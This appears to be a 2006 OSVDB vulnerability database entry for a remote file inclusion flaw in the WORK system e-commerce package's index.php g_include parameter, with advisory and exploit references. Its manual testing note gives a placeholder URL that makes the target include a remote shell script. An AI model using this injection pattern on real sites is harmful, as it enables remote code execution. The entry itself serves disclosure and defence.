WORK system e-commerce index.php g_include Variable Remote File Inclusion

2006-11-10T11:49:47
ID OSVDB:30491
Type osvdb
Reporter OSVDB
Modified 2006-11-10T11:49:47

Description

Manual Testing Notes

http://[target]/work/index.php?g_include=[shell_script]

References:

Vendor URL: http://worksystem.sourceforge.net/ Secunia Advisory ID:22963 Related OSVDB ID: 30492 Mail List Post: http://attrition.org/pipermail/vim/2006-November/001131.html Mail List Post: http://attrition.org/pipermail/vim/2006-November/001129.html Mail List Post: http://attrition.org/pipermail/vim/2006-November/001130.html Mail List Post: http://attrition.org/pipermail/vim/2006-November/001128.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0296.html ISS X-Force ID: 30199 Generic Exploit URL: http://www.milw0rm.com/exploits/2752 FrSIRT Advisory: ADV-2006-4582 CVE-2006-6041